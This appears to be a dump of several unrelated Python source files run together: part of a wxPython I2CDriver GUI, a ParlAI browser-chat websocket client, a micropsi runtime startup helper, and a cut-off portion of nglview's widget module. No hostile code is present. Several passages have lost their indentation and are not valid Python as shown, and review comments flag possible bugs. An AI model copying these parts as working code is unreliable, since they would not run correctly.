        """Write the hex bytes typed in `htc` to the selected address."""
        if (self.addr is not None) and htc.GetValue():
            vv = [int(c, 16) for c in htc.GetValue().split()]
            self.start(0)
            self.sd.write(vv)

    def read(self, e):
        """Read rxCount bytes from the selected address into rxVal."""
        n = int(self.rxCount.GetValue())
        if self.addr is not None:
            self.start(1)
            r = self.sd.read(n)
            bb = struct.unpack("B" * n, r)
            self.rxVal.SetValue(" ".join(["%02X" % b for b in bb]))
            self.stop()

    def devices(self):
        """Return {display_name: device_path} for candidate serial ports."""
        if sys.platform in ('win32', 'cygwin'):
            return {pi.device: pi.device for pi in slp.comports()}
        elif sys.platform == 'darwin':
            devdir = "/dev/"
            pattern = "^cu.usbserial-(.*)"
        else:
            devdir = "/dev/serial/by-id/"
            pattern = "^usb-FTDI_FT230X_Basic_UART_(........)-"
        if not os.access(devdir, os.R_OK):
            return {}
        devs = os.listdir(devdir)

        def match_dev(d):
            # renamed from `filter`, which shadowed the builtin
            m = re.match(pattern, d)
            if m:
                return (m.group(1), devdir + d)
        seldev = [match_dev(d) for d in devs]
        return dict([d for d in seldev if d])

    def connect(self, dev):
        """Open the I2CDriver at path `dev` and enable the UI."""
        self.sd = i2cdriver.I2CDriver(dev)
        [w.Enable(True) for w in self.allw]
        self.refresh(None)

    def refresh(self, e):
        """Periodic (1 Hz) status poll; also rescans the bus when idle."""
        if self.sd and not self.monitor and not self.capture:
            lowhigh = ["LOW", "HIGH"]
            self.sd.getstatus()
            self.label_serial.SetLabel(self.sd.serial)
            self.label_voltage.SetLabel("%.2f V" % self.sd.voltage)
            self.label_current.SetLabel("%d mA" % self.sd.current)
            self.label_temp.SetLabel("%.1f C" % self.sd.temp)
            self.label_speed.SetSelection({100: 0, 400: 1}[self.sd.speed])
            self.label_pullups.SetStringSelection(pullup_vals[self.sd.pullups & 7])
            self.label_sda.SetLabel(lowhigh[self.sd.sda])
            self.label_scl.SetLabel(lowhigh[self.sd.scl])
            days = self.sd.uptime // (24 * 3600)
            rem = self.sd.uptime % (24 * 3600)
            hh = rem // 3600
            mm = (rem // 60) % 60
            ss = rem % 60
            self.label_uptime.SetLabel("%d:%02d:%02d:%02d" % (days, hh, mm, ss))
            [d.Enable(True) for d in self.dynamic]
            # only scan while the bus is idle (both lines high, no transaction)
            if not self.started and (self.sd.sda == 1) and (self.sd.scl == 1):
                devs = self.sd.scan(True)
                for i, l in self.heat.items():
                    self.hot(i, i in devs)

    def choose_device(self, e):
        """Combo-box handler: connect to the selected serial device."""
        self.connect(self.devs[e.EventObject.GetValue()])

    def no_addr(self):
        """Disable the read/write controls (no address selected)."""
        [w.Enable(False) for w in self.dev_widgets]

    def choose_addr(self, e):
        """Radio-button handler: select the clicked I2C address."""
        o = e.EventObject
        v = o.GetValue()
        if v:
            self.addr = int(o.GetLabel(), 16)
            [w.Enable(True) for w in self.dev_widgets]

    def check_m(self, e):
        """Toggle monitor mode; status widgets are frozen while monitoring."""
        self.monitor = e.EventObject.GetValue()
        self.sd.monitor(self.monitor)
        [d.Enable(not self.monitor) for d in self.dynamic]
        if self.monitor:
            [self.hot(i, False) for i in self.heat]

    def check_c(self, e):
        """Toggle capture mode: start/stop the CSV capture worker thread."""
        global StopCapture
        cm = e.EventObject.GetValue()
        # self.sd.monitor(self.monitor)
        if cm:
            openFileDialog = wx.FileDialog(self, "CSV dump to file", "", "",
                                           "CSV files (*.csv)|*.csv",
                                           wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
            openFileDialog.ShowModal()
            self.log_csv = openFileDialog.GetPath()
            openFileDialog.Destroy()
            if self.log_csv == u"":
                # user cancelled: revert the toggle
                e.EventObject.SetValue(False)
                return
            StopCapture = False
            self.sd.dumpcount = 0
            t = threading.Thread(target=capture_thr, args=(self.sd, self.log_csv))
            t.daemon = True  # setDaemon() is deprecated (removed in Python 3.13)
            t.start()
        else:
            StopCapture = True
            wx.MessageBox("Capture finished. %d events written to \"%s\"" % (self.sd.dumpcount, self.log_csv), "Message", wx.OK | wx.ICON_INFORMATION)
            # wait for capture_thr to acknowledge (it clears the flag on exit);
            # sleep to avoid the previous 100%-CPU busy-wait
            while StopCapture:
                time.sleep(0.01)
        [d.Enable(not cm) for d in self.dynamic]
        if cm:
            [self.hot(i, False) for i in self.heat]
        self.capture = cm

    def set_speed(self, e):
        """Choice handler: set bus speed (100 or 400 kHz)."""
        w = e.EventObject
        s = int(w.GetString(w.GetCurrentSelection()))
        self.sd.setspeed(s)

    def set_pullups(self, e):
        """Choice handler: apply the chosen pullup code to SDA and SCL."""
        w = e.EventObject
        s = w.GetString(w.GetCurrentSelection())
        code = pullup_vals.index(s)
        # same 3-bit code for both SDA (low bits) and SCL (bits 3-5)
        self.sd.setpullups(code | (code << 3))

    def hot(self, i, s):
        """Render address `i` as present (bold/black) or absent (grey)."""
        l = self.heat[i]
        if s:
            l.SetForegroundColour((0, 0, 0))
            l.SetFont(self.addrfonts[1])
        else:
            l.SetForegroundColour((160,) * 3)
            l.SetFont(self.addrfonts[0])
        l.Enable(s)
        if i == self.addr:
            [w.Enable(s) for w in self.dev_widgets]
if __name__ == '__main__':
    app = wx.App(0)
    try:
        f = Frame(*sys.argv[1:])
        f.Show(True)
        app.MainLoop()
    except Exception:
        # was a bare except (also trapped KeyboardInterrupt); show any
        # startup/runtime error in a dialog instead of a lost console trace.
        import traceback  # sys is already imported at module level
        xc = traceback.format_exception(*sys.exc_info())
        dlg = wx.MessageDialog(None, "".join(xc),
                               "i2cgui Error Trap (%s)" % i2cdriver.__version__,
                               wx.OK | wx.ICON_WARNING)
        dlg.ShowModal()
        dlg.Destroy()
|
client.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import websocket
import threading
from parlai.core.params import ParlaiParser
from parlai.scripts.interactive_web import WEB_HTML, STYLE_SHEET, FONT_AWESOME
from http.server import BaseHTTPRequestHandler, HTTPServer
# Module-wide registry for the websocket ('ws') and the HTTP server ('wb').
SHARED = {}


def setup_interactive(ws):
    """Register the live websocket connection in the module registry."""
    SHARED['ws'] = ws


# Latest model reply text, and the event signalling its availability to do_POST.
new_message = None
message_available = threading.Event()
class BrowserHandler(BaseHTTPRequestHandler):
    """
    Handle HTTP requests.
    """

    def _interactive_running(self, reply_text):
        # Forward the browser's chat message to the model over the websocket.
        # "[DONE]" is the client-side command to shut everything down.
        data = {}
        data['text'] = reply_text.decode('utf-8')
        if data['text'] == "[DONE]":
            print('[ Closing socket... ]')
            SHARED['ws'].close()
            SHARED['wb'].shutdown()
        # NOTE(review): on "[DONE]" this still send()s after close() — that
        # likely raises; confirm whether the send should be in an else branch.
        json_data = json.dumps(data)
        SHARED['ws'].send(json_data)

    def do_HEAD(self):
        """
        Handle HEAD requests.
        """
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_POST(self):
        """
        Handle POST request, especially replying to a chat message.
        """
        if self.path == '/interact':
            content_length = int(self.headers['Content-Length'])
            body = self.rfile.read(content_length)
            # forward to the model, then block until on_message() publishes
            # the reply via new_message / message_available
            self._interactive_running(body)
            self.send_response(200)
            self.send_header('Content-type', 'application/json')
            self.end_headers()
            model_response = {'id': 'Model', 'episode_done': False}
            message_available.wait()
            model_response['text'] = new_message
            message_available.clear()
            json_str = json.dumps(model_response)
            self.wfile.write(bytes(json_str, 'utf-8'))
        elif self.path == '/reset':
            # nothing to reset server-side; acknowledge with an empty object
            self.send_response(200)
            self.send_header('Content-type', 'application/json')
            self.end_headers()
            self.wfile.write(bytes("{}", 'utf-8'))
        else:
            return self._respond({'status': 500})

    def do_GET(self):
        """
        Respond to GET request, especially the initial load.
        """
        paths = {
            '/': {'status': 200},
            '/favicon.ico': {'status': 202},  # Need for chrome
        }
        if self.path in paths:
            self._respond(paths[self.path])
        else:
            self._respond({'status': 500})

    def _handle_http(self, status_code, path, text=None):
        # Send headers and return the chat page body (same page for any path).
        self.send_response(status_code)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        content = WEB_HTML.format(STYLE_SHEET, FONT_AWESOME)
        return bytes(content, 'UTF-8')

    def _respond(self, opts):
        # Render and write the response for the given status options.
        response = self._handle_http(opts['status'], self.path)
        self.wfile.write(response)
def on_message(ws, message):
    """
    Store the incoming server message and signal that a reply is available.

    (The original docstring said "Prints", but the handler publishes the text
    to the waiting HTTP handler instead.)

    :param ws: a WebSocketApp
    :param message: json with 'text' field
    """
    global new_message
    payload = json.loads(message)
    new_message = payload['text']
    message_available.set()
def on_error(ws, error):
    """
    Report a websocket error to stdout.

    :param ws: WebSocketApp
    :param error: An error
    """
    print(error)
def on_close(ws):
    """
    Cleanup before closing connection.

    :param ws: WebSocketApp
    """
    # Reset color formatting if necessary
    print("Connection closed")
def _run_browser():
    """Serve the chat UI over HTTP on port 1234 (blocks forever).

    The server instance is published in SHARED['wb'] so the websocket
    handler can shut it down on "[DONE]".
    """
    server = HTTPServer(('0.0.0.0', 1234), BrowserHandler)
    print('Please connect to the link: http://{}:{}/'.format('0.0.0.0', 1234))
    SHARED['wb'] = server
    server.serve_forever()
def on_open(ws):
    """
    Launch the local browser-facing HTTP server once the websocket is up.

    :param ws: websocket.WebSocketApp that sends messages to a browser_manager
    """
    worker = threading.Thread(target=_run_browser)
    worker.start()
def setup_args():
    """
    Set up args, specifically for the port number.

    :return: parsed options containing the port from commandline arguments.
    """
    parser = ParlaiParser(False, False)
    group = parser.add_argument_group('Browser Chat')
    group.add_argument(
        '--port', default=35496, type=int, help='Port to run the browser chat server'
    )
    return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 34596)
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
"ws://localhost:{}/websocket".format(port),
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
setup_interactive(ws)
ws.run_forever()
|
mesh_startup.py | import os
import time
from micropsi_server.mesh_ipy import IPythonConnection
# Singleton IPython console connection shared by the helpers below.
ipython_client = IPythonConnection()
# Flag polled by the console loops; set by request_termination().
console_termination_requested = False
def no_exit(code):
    """Drop-in replacement for sys.exit that swallows the exit request."""
    pass
def start_runtime_and_console(port=7543):
    """Start the micropsi runtime (blocking) with the IPython console enabled.

    :param port: TCP port for the micropsi server (default 7543)
    """
    import micropsi_server
    import micropsi_server.micropsi_app
    import sys
    # Neutralize sys.exit so library code cannot tear down this process.
    sys.exit = no_exit
    # make sure we have a kernel dir to write to
    import jupyter_core
    kernel_dir = jupyter_core.paths.jupyter_path('kernels')[0]
    if not os.path.isdir(kernel_dir):
        print("Creating IPython kernel dir: %s" % kernel_dir)
        try:
            os.makedirs(kernel_dir)
        except Exception as e:
            # non-fatal: report and continue without a console
            print(e)
            print("Cannot create IPython kernel dir, IPython console may not be available.")

    def client_daemon():
        # Wait until the runtime publishes console info (or termination is
        # requested), then attach the IPython client to the existing kernel.
        # Currently unused: the thread start below is commented out.
        while micropsi_server.micropsi_app.get_console_info() is None and console_termination_requested is False:
            time.sleep(0.1)
        if console_termination_requested:
            return
        ipython_client.ipy_connect(["--existing"])
    # Disable IPython client for now, does not start, find out if there's a way around that
    # ipython_client_thread = Thread(target=client_daemon)
    # ipython_client_thread.start()
    micropsi_server.micropsi_app.main(None, port, console=True)
def start_console(kernel_info=None):
    """Configure the IPython console connection, then block until
    request_termination() flips the module-level flag.

    :param kernel_info: optional kernel connection dict; when given it is
        written to a temp file and passed to the client, otherwise the most
        recent existing kernel is used.
    """
    import tempfile
    import json
    if kernel_info is None:
        ipython_client.set_connection_args(["--existing"])
        # spin until termination is requested
        while console_termination_requested is False:
            time.sleep(0.1)
    else:
        # Persist the kernel connection info; delete=False so the file
        # outlives the `with` block for the client to read.
        # NOTE(review): original indentation was lost — the wait loop is
        # assumed to sit inside the `with`; confirm against upstream.
        with tempfile.NamedTemporaryFile(delete=False) as temp:
            temp.write(json.dumps(kernel_info).encode())
            temp.flush()
            ipython_client.set_connection_args(["--existing", temp.name])
            while console_termination_requested is False:
                time.sleep(0.1)
def request_termination():
    """Signal the console wait-loops to exit."""
    global console_termination_requested
    console_termination_requested = True
|
widget.py | import base64
import json
import logging
import threading
import time
import uuid
import ipywidgets as widgets
import ipywidgets.embed
import numpy as np
from IPython.display import display
from ipywidgets import (Image, Box, DOMWidget, HBox, VBox, IntSlider, Output, Play, Widget,
jslink)
from ipywidgets import widget as _widget
from traitlets import (Bool, CaselessStrEnum, Dict, Instance, Int, Integer,
List, Unicode, observe, validate)
import traitlets
from . import color, interpolate
from .adaptor import Structure, Trajectory
from .component import ComponentViewer
from .config import BACKENDS
from .player import TrajectoryPlayer, _dry_run
from .remote_thread import RemoteCallThread
from .representation import RepresentationControl
from .shape import Shape
from .stage import Stage
from .utils import py_utils, widget_utils
from .utils.py_utils import (FileManager, _camelize_dict, _update_url,
encode_base64, get_repr_names_from_dict,
seq_to_string)
from .viewer_control import ViewerControl
from ._frontend import __frontend_version__
from .base import BaseWidget
# Re-export ipywidgets' serializer for the Instance traits declared below.
widget_serialization = _widget.widget_serialization
__all__ = ['NGLWidget', 'ComponentViewer']
# NOTE(review): consumed outside this chunk; presumably remote-call method
# names whose completion must not re-fire queued callbacks — confirm at the
# usage site.
_EXCLUDED_CALLBACK_AFTER_FIRING = {
    'setUnSyncCamera',
    'setSelector',
    'setDelay',
    'autoView',
    '_downloadImage',
    '_exportImage',
    'set_representation_from_backend',
}
def _deprecated(msg):
def wrap_1(func):
def wrap_2(*args, **kwargs):
logging.warn(msg)
return func(*args, **kwargs)
return wrap_2
return wrap_1
def write_html(fp, views, frame_range=None):
    # type: (str, List[NGLWidget]) -> None
    """EXPERIMENTAL. Likely will be changed.

    Make html file to display a list of views. For further options, please
    check `ipywidgets.embed` module.

    Parameters
    ----------
    fp : str or file handle
    views : a DOMWidget view or a list of views.
    frame_range : None or a tuple of int

    Examples
    --------
    >>> import nglview
    >>> view = nglview.show_pdbid('1tsu')
    >>> view # doctest: +SKIP
    >>> nglview.write_html('index.html', [view]) # doctest: +SKIP
    >>> nglview.write_html('index.html', [view], frame_range=(0, 5)) # doctest: +SKIP
    """
    # Accept a single view as well as a list (replaces the fragile
    # `cond and [views] or views` idiom).
    if isinstance(views, DOMWidget):
        views = [views]
    embed = ipywidgets.embed
    # Locate the singleton color-registry and theme widgets attached to the
    # first view; they must be embedded first. (Local was named `color`,
    # shadowing this module's `color` import.)
    color_registry = None
    theme = None
    for k, v in views[0].widgets.items():
        if v.__class__.__name__ == '_ColormakerRegistry':
            color_registry = v
        if v.__class__.__name__ == 'ThemeManager':
            theme = v
    # insertion order preserved: theme ends up before color_registry at index 0
    for v in [color_registry, theme]:
        if v:
            views.insert(0, v)

    def _set_serialization(views):
        # enable embed serialization recursively (Box containers nest views)
        for view in views:
            if hasattr(view, '_set_serialization'):
                view._set_serialization(frame_range=frame_range)
            elif isinstance(view, Box):
                _set_serialization(view.children)

    def _unset_serialization(views):
        for view in views:
            if hasattr(view, '_unset_serialization'):
                view._unset_serialization()
            elif isinstance(view, Box):
                _unset_serialization(view.children)

    _set_serialization(views)
    # FIXME: allow add jquery-ui link?
    snippet = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.css">\n'
    snippet += embed.embed_snippet(views)
    html_code = embed.html_template.format(title='nglview-demo',
                                           snippet=snippet)
    # from ipywidgets
    # Check if fp is writable:
    if hasattr(fp, 'write'):
        fp.write(html_code)
    else:
        # Assume fp is a filename:
        with open(fp, "w") as f:
            f.write(html_code)
    _unset_serialization(views)
class NGLWidget(DOMWidget):
_view_name = Unicode("NGLView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("NGLModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_ngl_version = Unicode().tag(sync=True)
# _model_name = Unicode("NGLView").tag(sync=True)
# _model_module = Unicode("nglview-js-widgets").tag(sync=True)
_image_data = Unicode().tag(sync=False)
# use Integer here, because mdtraj uses a long datatype here on Python-2.7
frame = Integer().tag(sync=True)
max_frame = Int(0).tag(sync=True)
background = Unicode('white').tag(sync=True)
loaded = Bool(False).tag(sync=False)
picked = Dict().tag(sync=True)
n_components = Int(0).tag(sync=True)
_view_width = Unicode().tag(sync=True) # px
_view_height = Unicode().tag(sync=True) # px
_scene_position = Dict().tag(sync=True)
_scene_rotation = Dict().tag(sync=True)
# hack to always display movie
# TODO: remove _parameters?
_parameters = Dict().tag(sync=False)
_ngl_full_stage_parameters = Dict().tag(sync=True)
_ngl_original_stage_parameters = Dict().tag(sync=True)
_coordinates_dict = Dict().tag(sync=False)
_camera_str = CaselessStrEnum(['perspective', 'orthographic'],
default_value='orthographic').tag(sync=True)
_camera_orientation = List().tag(sync=True)
_synced_model_ids = List().tag(sync=True)
_synced_repr_model_ids = List().tag(sync=True)
_ngl_view_id = List().tag(sync=True)
_ngl_repr_dict = Dict().tag(sync=True)
_ngl_component_ids = List().tag(sync=False)
_ngl_component_names = List().tag(sync=False)
_ngl_msg = None
_send_binary = Bool(True).tag(sync=False)
_init_gui = Bool(False).tag(sync=False)
gui_style = CaselessStrEnum(['ngl'], allow_none=True).tag(sync=True)
_gui_theme = CaselessStrEnum(['dark', 'light'], allow_none=True).tag(sync=True)
_widget_theme = None
_ngl_serialize = Bool(False).tag(sync=True)
_ngl_msg_archive = List().tag(sync=True)
_ngl_coordinate_resource = Dict().tag(sync=True)
_representations = List().tag(sync=False)
_ngl_color_dict = Dict().tag(sync=True)
_player_dict = Dict().tag(sync=True)
# instance
_iplayer = Instance(widgets.Box,
allow_none=True).tag(sync=True, **widget_serialization)
_igui = Instance(widgets.Tab,
allow_none=True).tag(sync=True, **widget_serialization)
_ibtn_fullscreen = Instance(widgets.Button,
allow_none=True).tag(sync=True, **widget_serialization)
def __init__(self,
structure=None,
representations=None,
parameters=None,
**kwargs):
super().__init__(**kwargs)
self._gui = None
self._init_gui = kwargs.pop('gui', False)
self._theme = kwargs.pop('theme', 'default')
self._widget_image = Image()
self._widget_image.width = 900.
self._image_array = []
# do not use _displayed_callbacks since there is another Widget._display_callbacks
self._event = threading.Event()
self._ngl_displayed_callbacks_before_loaded = []
widget_utils._add_repr_method_shortcut(self, self)
self.shape = Shape(view=self)
self.stage = Stage(view=self)
self.control = ViewerControl(view=self)
self._handle_msg_thread = threading.Thread(
target=self.on_msg, args=(self._ngl_handle_msg, ))
# # register to get data from JS side
self._handle_msg_thread.daemon = True
self._handle_msg_thread.start()
self._remote_call_thread = RemoteCallThread(
self,
registered_funcs=['loadFile', 'replaceStructure', '_exportImage'])
self._remote_call_thread.start()
self._trajlist = []
self._ngl_component_ids = []
if representations:
# Must be set here before calling
# add_trajectory or add_struture
# After finish adding new Structure/Trajectory,
# initial representations will be set.
kwargs['default_representation'] = False
else:
if 'default' in kwargs:
kwargs['default_representation'] = kwargs['default']
autoview = 'center' not in kwargs or ('center' in kwargs
and kwargs.pop('center'))
# NOTE: Using `pop` to avoid passing `center` to NGL.
if parameters:
self.parameters = parameters
if isinstance(structure, Trajectory):
name = py_utils.get_name(structure, kwargs)
self.add_trajectory(structure, name=name, **kwargs)
elif isinstance(structure, (list, tuple)):
trajectories = structure
for trajectory in trajectories:
name = py_utils.get_name(trajectory, kwargs)
self.add_trajectory(trajectory, name=name, **kwargs)
else:
if structure is not None:
self.add_structure(structure, **kwargs)
if representations:
# If initial representations are provided,
# we need to set defaultRepresentation to False
self.representations = representations
if autoview:
self.center()
self.player = TrajectoryPlayer(self)
self._view_width = kwargs.get('width', '')
self._view_height = kwargs.get('height', '')
# Updating only self.layout.{width, height} don't handle
# resizing NGL widget properly.
self._sync_with_layout()
# self.layout.width = 'auto'
self._create_player()
self._create_ibtn_fullscreen()
def _create_ibtn_fullscreen(self):
button = widgets.Button(icon='compress')
button.layout.width = '34px'
# onclick is implemented in frontend
self._ibtn_fullscreen = button
def _sync_with_layout(self):
def on_change_layout(change):
new = change['new']
if change['name'] == 'width':
self._set_size(new, '')
elif change['name'] == 'height':
self._set_size('', new)
self.layout.observe(on_change_layout, ['width', 'height'])
    def _set_serialization(self, frame_range=None):
        """Prepare widget state for embedding/serialization.

        If `frame_range` is given, base64-encoded coordinates for those
        frames of every trajectory are cached in
        ``self._ngl_coordinate_resource`` so an embedded (kernel-less)
        widget can still play them.
        """
        self._ngl_serialize = True
        resource = self._ngl_coordinate_resource
        if frame_range is not None:
            for t_index, traj in enumerate(self._trajlist):
                resource[t_index] = []
                for f_index in range(*frame_range):
                    if f_index < traj.n_frames:
                        resource[t_index].append(
                            encode_base64(traj.get_coordinates(f_index)))
                    else:
                        # pad frames beyond the trajectory length with an
                        # empty float32 array
                        resource[t_index].append(
                            encode_base64(np.empty((0), dtype='f4')))
            # NOTE(review): assumes at least one trajectory is loaded when
            # frame_range is given; resource[0] raises KeyError otherwise.
            resource['n_frames'] = len(resource[0])
        self._ngl_coordinate_resource = resource
        self._ngl_color_dict = color._USER_COLOR_DICT.copy()
    def _create_player(self):
        """Build the frame player (Play button + slider).

        Values and maxima are linked frontend-side with ``jslink`` so
        playback does not round-trip through the kernel.
        """
        player = Play(max=self.max_frame, interval=100)
        slider = IntSlider(max=self.max_frame)
        self._iplayer = HBox([player, slider])
        self.player.widget_player = player
        self.player.widget_player_slider = slider
        jslink((player, 'value'), (slider, 'value'))
        jslink((player, 'value'), (self, 'frame'))
        jslink((player, 'max'), (self, 'max_frame'))
        jslink((slider, 'max'), (self, 'max_frame'))
    def _unset_serialization(self):
        """Disable embedding mode and drop the cached coordinate frames."""
        self._ngl_serialize = False
        self._ngl_coordinate_resource = {}
    @property
    def parameters(self):
        """dict : the last (camelized) parameters set from Python."""
        return self._parameters
@parameters.setter
def parameters(self, params):
params = _camelize_dict(params)
self._parameters = params
self._remote_call('setParameters', target='Widget', args=[
params,
])
    @property
    def camera(self):
        """str : current camera type ('perspective' or 'orthographic')."""
        return self._camera_str
    @camera.setter
    def camera(self, value):
        """Set the NGL stage camera type.

        Parameters
        ----------
        value : str, {'perspective', 'orthographic'}
        """
        self._camera_str = value
        # use _remote_call so this function can be called right after
        # self is displayed
        self._remote_call("setParameters",
                          target='Stage',
                          kwargs=dict(cameraType=self._camera_str))
    def _set_camera_orientation(self, arr):
        """Send a camera orientation matrix (flat array) to the frontend."""
        self._remote_call('set_camera_orientation',
                          target='Widget',
                          args=[
                              arr,
                          ])
    def _request_stage_parameters(self):
        """Ask the frontend to push its current stage parameters back
        (arrives later as a 'stage_parameters' message)."""
        self._remote_call('requestUpdateStageParameters', target='Widget')
@validate('gui_style')
def _validate_gui_style(self, proposal):
val = proposal['value']
if val == 'ngl':
if self._widget_theme is None:
from .theme import ThemeManager
self._widget_theme = ThemeManager()
if self._widget_theme._theme is None:
self._widget_theme.light()
return val
    @observe("_gui_theme")
    def _on_theme_changed(self, change):
        """Apply the dark/light theme when the ``_gui_theme`` trait changes."""
        # EXPERIMENTAL
        # NOTE(review): `theme` is imported but not referenced below — it may
        # be kept for import side effects; confirm before removing.
        # Also assumes self._widget_theme exists (created via gui_style='ngl');
        # otherwise this raises AttributeError — TODO confirm.
        from nglview.theme import theme
        if change.new == 'dark':
            self._widget_theme.dark()
        elif change.new == 'light':
            self._widget_theme.light()
    @observe('picked')
    def _on_picked(self, change):
        """Forward pick events, JSON-encoded, to the player's picked widget."""
        picked = change['new']
        if self.player.widget_picked is not None:
            self.player.widget_picked.value = json.dumps(picked)
@observe('background')
def _update_background_color(self, change):
color = change['new']
self.stage.set_parameters(background_color=color)
    def handle_resize(self):
        """Ask the frontend to recompute the canvas size."""
        # self._remote_call("handleResize", target='Stage')
        self._remote_call("handleResize")
    @observe('n_components')
    def _handle_n_components_changed(self, change):
        """Keep the repr-control GUI consistent when components are
        added or removed (slider ranges, dropdown options)."""
        if self.player.widget_repr is not None:
            component_slider = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'component_slider')
            if change['new'] - 1 >= component_slider.min:
                component_slider.max = change['new'] - 1
            component_dropdown = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'component_dropdown')
            component_dropdown.options = tuple(self._ngl_component_names)
            if change['new'] == 0:
                # no components left: blank out every repr-related control
                component_dropdown.options = tuple([' '])
                component_dropdown.value = ' '
                component_slider.max = 0
                reprlist_choices = widget_utils.get_widget_by_name(
                    self.player.widget_repr, 'reprlist_choices')
                reprlist_choices.options = tuple([' '])
                repr_slider = widget_utils.get_widget_by_name(
                    self.player.widget_repr, 'repr_slider')
                repr_slider.max = 0
                repr_name_text = widget_utils.get_widget_by_name(
                    self.player.widget_repr, 'repr_name_text')
                repr_selection = widget_utils.get_widget_by_name(
                    self.player.widget_repr, 'repr_selection')
                repr_name_text.value = ' '
                repr_selection.value = ' '
    @observe('_ngl_repr_dict')
    def _handle_repr_dict_changed(self, change):
        """Refresh the repr GUI controls when the frontend sends a new
        representation dict (see `_ngl_handle_msg`, 'request_repr_dict')."""
        if self.player.widget_repr is not None:
            repr_slider = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'repr_slider')
            component_slider = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'component_slider')
            repr_name_text = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'repr_name_text')
            repr_selection = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'repr_selection')
            reprlist_choices = widget_utils.get_widget_by_name(
                self.player.widget_repr, 'reprlist_choices')
            repr_names = get_repr_names_from_dict(self._ngl_repr_dict,
                                                  component_slider.value)
            # {0: {}} is the frontend's "empty" sentinel
            if change['new'] == {0: {}}:
                repr_selection.value = ''
            else:
                options = tuple(
                    str(i) + '-' + name for (i, name) in enumerate(repr_names))
                reprlist_choices.options = options
                try:
                    value = reprlist_choices.options[repr_slider.value]
                    if isinstance(value, tuple):
                        # https://github.com/jupyter-widgets/ipywidgets/issues/1512
                        value = value[0]
                    reprlist_choices.value = value
                except IndexError:
                    if repr_slider.value == 0:
                        # works fine with ipywidgets 5.2.2
                        reprlist_choices.options = tuple([
                            ' ',
                        ])
                        reprlist_choices.value = ' '
                    else:
                        reprlist_choices.value = reprlist_choices.options[
                            repr_slider.value - 1]
                # e.g: 0-cartoon
                repr_name_text.value = reprlist_choices.value.split(
                    '-')[-1].strip()
                repr_slider.max = len(repr_names) - 1 if len(
                    repr_names) >= 1 else len(repr_names)
def _update_max_frame(self):
self.max_frame = max(
int(traj.n_frames) for traj in self._trajlist
if hasattr(traj, 'n_frames')) - 1 # index starts from 0
def _wait_until_finished(self, timeout=0.0001):
# NGL need to send 'finished' signal to
# backend
self._event.clear()
while True:
# idle to make room for waiting for
# "finished" event sent from JS
time.sleep(timeout)
if self._event.is_set():
# if event is set from another thread
# break while True
break
def _run_on_another_thread(self, func, *args):
# use `event` to singal
# func(*args)
thread = threading.Thread(
target=func,
args=args,
)
thread.daemon = True
thread.start()
return thread
    @observe('loaded')
    def on_loaded(self, change):
        """Once the frontend reports loaded, flush the queued callbacks."""
        # trick for firefox on Linux
        time.sleep(0.1)
        if change['new']:
            self._fire_callbacks(self._ngl_displayed_callbacks_before_loaded)
    def _fire_callbacks(self, callbacks):
        """Run queued remote-call callbacks on a background thread.

        'loadFile' calls are awaited one at a time (the frontend sets
        ``self._event`` when done) so components load in order.
        """
        def _call(event):
            for callback in callbacks:
                callback(self)
                if callback._method_name == 'loadFile':
                    self._wait_until_finished()
        self._run_on_another_thread(_call, self._event)
    def _ipython_display_(self, **kwargs):
        """Display the widget; also show the GUI if `_init_gui` was set."""
        super()._ipython_display_(**kwargs)
        if self._init_gui:
            if self._gui is None:
                self._gui = self.player._display()
            display(self._gui)
    def display(self, gui=False, style='ngl'):
        """
        Parameters
        ----------
        gui : bool
            If True: turn on GUI
        style : str, {'ngl', 'ipywidgets}, default 'ngl'
            GUI style (with gui=True)

        Returns
        -------
        An HBox (view + GUI) for the legacy 'ipywidgets' style,
        otherwise `self`.
        """
        if gui:
            if style == 'ipywidgets':
                # For the old implementation
                # is there anyone using this?
                self.gui_style = None # turn off the NGL's GUI
                self._gui = self.player._display()
                self._gui.layout.align_self = 'stretch'
                self._gui.layout.width = '400px'
                b = HBox([self, self._gui])
                def on(b):
                    # resize once the box is actually rendered
                    self.handle_resize()
                b.on_displayed(on)
                return b
            elif style == 'ngl':
                self.gui_style = 'ngl'
                return self
        else:
            return self
def _set_size(self, w, h):
'''
Parameters
----------
w, h : float or str
Examples
--------
>>> import nglview; view = nglview.demo()
>>> view._set_size(100, 100)
>>> view._set_size('100px', '100px')
>>> view._set_size('50%', '50%')
'''
self._remote_call('setSize', target='Widget', args=[w, h])
def _set_sync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = sorted(
set(self._synced_repr_model_ids) | model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_unsync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = list(set(self._synced_repr_model_ids) - model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_sync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = sorted(
set(self._synced_model_ids) | model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_unsync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = list(set(self._synced_model_ids) - model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
    def _set_spin(self, axis, angle):
